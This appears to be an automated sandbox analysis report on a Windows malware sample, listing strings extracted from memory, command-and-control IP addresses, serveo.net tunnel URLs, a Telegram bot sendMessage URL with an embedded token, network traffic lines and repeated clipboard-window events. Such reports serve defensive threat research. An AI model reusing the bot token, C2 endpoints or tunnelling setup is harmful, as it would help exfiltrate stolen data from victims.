Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net
Source: ssh.exe, 00000018.00000002.4563439205.0000020D735FC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000002.4563439205.0000020D73660000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000003.3449996939.0000020D735FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://138.2.92.67:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://154.9.207.142:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://185.217.98.121:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://192.99.196.191:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://44.228.161.50:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://46.51.231.213:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://5.196.181.135:443
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F291000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.tele
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://node.trezor.io
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/product
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
